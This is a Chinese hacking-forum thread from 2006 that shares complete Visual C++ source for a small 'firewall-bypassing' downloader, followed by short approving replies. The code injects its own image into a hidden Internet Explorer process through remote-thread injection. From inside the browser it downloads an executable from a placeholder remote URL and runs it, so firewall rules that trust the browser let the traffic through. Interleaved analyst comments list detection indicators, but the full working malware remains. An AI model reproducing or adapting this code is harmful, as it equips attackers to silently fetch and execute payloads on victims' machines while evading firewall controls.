
matin 2006-12-23 10:29

[VC源码]3k穿墙下载者

[size=2][code]/*
   "mini_downloader"
   code bykardinal p.s.t
   compile by vc++ 6.0
   can not run under win98;
*/
#include <windows.h>

#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")

// Original author's note: uncommenting the next four linker options shrinks the
// compiled file to about 2K.
//#pragma comment(linker, "/OPT:NOWIN98")
//#pragma comment(linker, "/merge:.data=.text")   
//#pragma comment(linker, "/merge:.rdata=.text")   
//#pragma comment(linker, "/align:0x200")
// Analyst note: the three active linker options below are visible in the PE
// header of a built sample and are useful static indicators:
//   /ENTRY:main        - main() is the image entry point rather than the CRT startup routine.
//   /subsystem:windows - GUI subsystem, so no console window appears.
//   /BASE:0x13150000   - non-default preferred image base. main() requests remote
//                        memory at this module's own base address, so the copied
//                        image is expected to land at the address it was linked for.
#pragma comment(linker, "/ENTRY:main")   
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
   
   // Function pointers bound at run time in download() with GetProcAddress, so
   // shell32.dll / urlmon.dll and these two APIs do not show up in the import
   // table; the DLL and function names are still present as plain strings.
   HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );// bound to ShellExecuteA from shell32.dll at run time
   DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);// bound to URLDownloadToFileA from urlmon.dll at run time
   // Handle and process id of the target process; both are set in main().
   HANDLE processhandle;
   DWORD pid;
   // Module handles returned by LoadLibrary in download().
   HINSTANCE hshell,hurlmon;

/*
   download - routine used as the start address of the remote thread that
   main() creates in the target process.

   It loads shell32.dll and urlmon.dll, resolves ShellExecuteA and
   URLDownloadToFileA by name, downloads a hard-coded URL to c:\ieinst12.exe,
   opens that file, and then calls ExitProcess. Takes no parameters and never
   returns. No return value is checked anywhere in this routine.

   Analyst notes:
   - When started through main(), this code runs inside the process that owns
     the "IEFrame" window, so the HTTP request is issued by that process. A
     per-application firewall rule that trusts the browser attributes the
     traffic to the browser; allow-listing by process identity alone does not
     cover this case.
   - Observable artefacts: a urlmon download made by the browser process, an
     executable written to the root of C:, and a new process started from
     that file by the browser process (file-creation and process-creation
     telemetry, e.g. Sysmon event IDs 11 and 1).
*/
void download() // download routine executed in the injected process
{
   hshell=LoadLibrary("Shell32.dll");
   hurlmon=LoadLibrary("urlmon.dll");

   // Resolve both APIs by name at run time and store them in the global pointers.
   (FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
   (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");

   // Fetch the (placeholder) URL to a fixed path, then open the file with show command 5 (SW_SHOW).
   DOWNFILE(NULL,"http://www.xxxxxxx.cn/en/notepad.exe","c:\\ieinst12.exe",0, NULL);
   SHELLRUN(0,"open","c:\\ieinst12.exe",NULL,NULL,5);
   // Ends the process this thread is running in.
   ExitProcess(0);
};
   

/*
   main - image entry point (set with /ENTRY:main).

   Starts a hidden Internet Explorer instance, opens the process that owns the
   first "IEFrame" window, copies this program's whole in-memory image into
   that process at the same base address, and starts a remote thread at
   download(). No API return value is checked.

   Analyst notes: the call sequence OpenProcess(PROCESS_ALL_ACCESS) ->
   VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory ->
   CreateRemoteThread is the classic cross-process injection pattern. It is
   visible to API monitoring and to Sysmon (event ID 10 ProcessAccess, event
   ID 8 CreateRemoteThread), and it leaves a private, non-image-backed
   read/write/execute region in the browser process that memory scanners can
   find. A browser launched with SW_HIDE by an unrelated parent process is a
   further indicator.
*/
void main() // program entry point
{   
    // 1. Build the Internet Explorer path and launch it
   char iename[MAX_PATH],iepath[MAX_PATH];
   ZeroMemory(iename,sizeof(iename));
   ZeroMemory(iepath,sizeof(iepath));

   GetWindowsDirectory(iepath,MAX_PATH);
   // Keep only the first 3 characters of the Windows directory (the drive
   // root, e.g. "C:\"); iename was zeroed above, so it stays NUL-terminated.
   strncpy(iename,iepath,3);
   strcat(iename,"program files\\Internet Explorer\\IEXPLORE.EXE");
   //strcat(iename,"windows\\notepad.EXE");
   // Launch the browser with its window hidden, then wait 500 ms before looking for its window.
   WinExec(iename,SW_HIDE);
   Sleep(500);

   // 2. Obtain a handle to the IE process
   HWND htemp;
   // First top-level window of class "IEFrame"; this may belong to an IE
   // instance that was already running rather than the one just started.
   htemp=FindWindow("IEFrame",NULL);
   GetWindowThreadProcessId(htemp,&pid);
   processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
   
   // 3. Allocate memory in the target process
   HMODULE Module;
   LPVOID NewModule;
   DWORD Size;
   LPDWORD lpimagesize;

   Module = GetModuleHandle(NULL);// base address of this process's own image
   // Get the size of the in-memory image: the inline assembly reads the DWORD
   // at Module+0x3c (e_lfanew, offset of the PE header) and then the DWORD at
   // PE header + 0x50, which is OptionalHeader.SizeOfImage in a PE32 file.
   // Despite its pointer type, lpimagesize receives the size value itself.
   _asm
   {
       push eax;
       push ebx;
       mov ebx,Module;
       mov eax,[ebx+0x3c];
       lea eax,[ebx+eax+0x50];   
       mov eax,[eax]
       mov lpimagesize,eax;
       pop ebx;
       pop eax;
   };
   Size=(DWORD)lpimagesize;
   NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);// request the region at the same address as the local image base, as read/write/execute memory

   // 4. Write memory and create the thread
   WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);// copy the whole local image into the target process
   LPTHREAD_START_ROUTINE entrypoint;
   // Take the local address of download(); it is used unchanged as the remote
   // start address, which relies on the copy sitting at the same base address.
   __asm
   {
       push eax;
       lea eax,download;
       mov entrypoint,eax;
       pop eax
   }
   
   CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL);    // create the remote thread and run it; Module is passed as the thread parameter, which download() does not use
   
   // 5. Close the process handle
   CloseHandle(processhandle);
   return;
} ;[/code][/size]

[[i] 本帖最后由 逃学书童 于 2007-7-9 13:35 编辑 [/i]]

antkav 2006-12-25 15:50

哈哈,找个研究下

zzm 2006-12-25 16:55

我最喜欢收藏源代码了…………:lol

uglypig 2006-12-26 00:36

他是如何过防火墙的呢????

逃学书童 2007-3-23 08:11

支持源码,支持发帖!!!:victory: :) :)

追雪人 2008-1-14 19:20

收藏了,顶一下。